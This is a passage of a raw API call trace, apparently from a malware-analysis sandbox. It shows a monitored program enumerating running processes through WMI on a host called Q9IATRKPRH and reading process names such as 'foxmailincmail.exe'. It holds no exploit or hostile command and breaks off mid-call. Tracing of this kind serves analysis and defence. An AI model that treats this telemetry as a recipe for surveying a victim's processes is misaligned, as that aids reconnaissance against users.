IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebaef0, puReturned=0x26dde18 | out: apObjects=0x5ebaef0*=0x5ebb860, puReturned=0x26dde18*=0x1) returned 0x0 [0225.184] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebb860) returned 0x0 [0225.184] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.184] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.184] IUnknown:AddRef (This=0x5ebb860) returned 0x3 [0225.184] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.184] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.184] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebb864) returned 0x0 [0225.184] IMarshal:GetUnmarshalClass (in: This=0x5ebb864, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.185] IUnknown:Release (This=0x5ebb864) returned 0x3 [0225.185] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.185] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.185] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.185] IUnknown:Release (This=0x5ebb860) returned 0x2 [0225.185] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.185] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.185] IUnknown:QueryInterface (in: This=0x5ebb860, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebb860) returned 0x0 [0225.185] IUnknown:AddRef (This=0x5ebb860) returned 0x4 [0225.185] IUnknown:Release (This=0x5ebb860) returned 0x3 [0225.185] IUnknown:Release (This=0x5ebb860) returned 0x2 [0225.185] CoTaskMemFree (pv=0x5ebaef0) [0225.185] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.185] IUnknown:AddRef (This=0x5ebb860) returned 0x3 [0225.185] IWbemClassObject:Get (in: This=0x5ebb860, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.186] IWbemClassObject:Get (in: This=0x5ebb860, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.186] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"") returned 0x66 [0225.186] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"") returned 0x66 [0225.186] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.186] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.186] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.186] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.187] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebaef0) returned 0x0 [0225.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebaef0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.187] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebaef0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb89d8) returned 0x0 [0225.187] WbemDefPath:IUnknown:Release (This=0x5ebaef0) returned 0x0 [0225.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb89d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb89d8) returned 0x0 [0225.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb89d8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.187] WbemDefPath:IUnknown:AddRef (This=0x5eb89d8) returned 0x3 [0225.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb89d8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb89d8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb89d8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebaf00) returned 0x0 [0225.188] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebaf00, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.188] WbemDefPath:IUnknown:Release (This=0x5ebaf00) returned 0x3 [0225.188] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.188] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb89d8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.188] WbemDefPath:IUnknown:Release (This=0x5eb89d8) returned 0x2 [0225.188] WbemDefPath:IUnknown:Release (This=0x5eb89d8) returned 0x1 [0225.188] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.188] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb89d8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb89d8) returned 0x0 [0225.188] WbemDefPath:IUnknown:AddRef (This=0x5eb89d8) returned 0x3 [0225.188] WbemDefPath:IUnknown:Release (This=0x5eb89d8) returned 0x2 [0225.188] WbemDefPath:IWbemPath:SetText (This=0x5eb89d8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3052\"") returned 0x0 [0225.188] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.188] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.188] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.188] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.188] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.188] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.188] IWbemClassObject:Get (in: This=0x5ebb860, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f0f84*=0, plFlavor=0x26f0f88*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x26f0f84*=8, plFlavor=0x26f0f88*=0) returned 0x0 [0225.188] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0225.188] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0225.189] IWbemClassObject:Get (in: This=0x5ebb860, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f0f84*=8, plFlavor=0x26f0f88*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x26f0f84*=8, plFlavor=0x26f0f88*=0) returned 0x0 [0225.189] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0225.189] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0225.189] CoTaskMemAlloc (cb=0x4) returned 0x5ebaf30 [0225.189] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebaf30, puReturned=0x26dde18 | out: apObjects=0x5ebaf30*=0x5ebb9f8, puReturned=0x26dde18*=0x1) returned 0x0 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebb9f8) returned 0x0 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.190] IUnknown:AddRef (This=0x5ebb9f8) returned 0x3 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebb9fc) returned 0x0 [0225.190] IMarshal:GetUnmarshalClass (in: This=0x5ebb9fc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.190] IUnknown:Release (This=0x5ebb9fc) returned 0x3 [0225.190] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.190] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.190] IUnknown:Release (This=0x5ebb9f8) returned 0x2 [0225.190] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.190] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.190] IUnknown:QueryInterface (in: This=0x5ebb9f8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebb9f8) returned 0x0 [0225.191] IUnknown:AddRef (This=0x5ebb9f8) returned 0x4 [0225.191] IUnknown:Release (This=0x5ebb9f8) returned 0x3 [0225.191] IUnknown:Release (This=0x5ebb9f8) returned 0x2 [0225.191] CoTaskMemFree (pv=0x5ebaf30) [0225.191] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.191] IUnknown:AddRef (This=0x5ebb9f8) returned 0x3 [0225.191] IWbemClassObject:Get (in: This=0x5ebb9f8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.191] IWbemClassObject:Get (in: This=0x5ebb9f8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.191] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"") returned 0x66 [0225.191] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"") returned 0x66 [0225.192] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.192] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.192] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.192] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.192] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebaf30) returned 0x0 [0225.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebaf30, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.193] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebaf30, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8ab8) returned 0x0 [0225.193] WbemDefPath:IUnknown:Release (This=0x5ebaf30) returned 0x0 [0225.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8ab8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8ab8) returned 0x0 [0225.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8ab8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.193] WbemDefPath:IUnknown:AddRef (This=0x5eb8ab8) returned 0x3 [0225.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8ab8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8ab8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8ab8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebaf40) returned 0x0 [0225.193] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebaf40, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.193] WbemDefPath:IUnknown:Release (This=0x5ebaf40) returned 0x3 [0225.193] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.193] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.193] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8ab8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.193] WbemDefPath:IUnknown:Release (This=0x5eb8ab8) returned 0x2 [0225.193] WbemDefPath:IUnknown:Release (This=0x5eb8ab8) returned 0x1 [0225.194] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.194] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8ab8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8ab8) returned 0x0 [0225.194] WbemDefPath:IUnknown:AddRef (This=0x5eb8ab8) returned 0x3 [0225.194] WbemDefPath:IUnknown:Release (This=0x5eb8ab8) returned 0x2 [0225.194] WbemDefPath:IWbemPath:SetText (This=0x5eb8ab8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"") returned 0x0 [0225.194] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.194] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.194] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.194] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.194] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: 